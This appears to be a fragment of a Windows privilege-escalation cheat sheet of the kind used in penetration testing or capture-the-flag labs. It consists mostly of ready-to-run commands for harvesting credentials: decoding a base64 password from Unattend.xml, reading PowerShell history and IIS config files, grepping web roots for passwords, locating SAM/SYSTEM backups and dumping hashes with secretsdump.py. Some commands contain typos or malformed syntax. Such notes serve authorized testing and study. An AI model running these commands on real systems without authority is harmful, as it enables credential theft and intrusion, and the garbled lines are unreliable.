# Kali, decode the value of the password in Unattend.xml
echo 'TABvAGMAYQBsAEEAZABtAGkAbgBQAGEAcwBzAHcAbwByAGQAMQAhAA==' | base64 --decode
PowerShell History File
CMD> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS> cat (Get-PSReadlineOption).HistorySavePath
winPEAS will capture the info. We will need to manually extract the contents of the file
IIS Config and Web Files
CMD> type C:\inetpub\wwwroot\web.config
CMD> type C:\inetpub\wwwroot\conntectionstrings.config
# C:\intepub C:\apache C:\xampp
PS> Get-Childitem -Recurse C:\inetpub | findstr -i "directory config txt aspx ps1 bat xml pass user"
PS> Get-Childitem -Recurse C:\apache | findstr -i "directory config txt php ps1 bat xml pass user"
PS> Get-Childitem -Recurse C:\xampp | findstr -i "directory config txt php ps1 bat xml pass user"
Alternative Data Streams
Files have a primary data stream, which is what we normally see, for example a TXT file with some text inside. However, when a file is placed within another file, the data stream of the second files contents are considered alternate.
# Windows
# Check if SAM files are discovered.
CMD> cd C:\ & dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK
# Check if you can copy them
CMD> icacls "C:\Windows\System32\Config\Regback"
# Crack the SAM files
kali> secretsdump.py -sam SAM.OLD -system SYSTEM.OLD LOCAL
Check (M) or (F) permission to modify or Full access.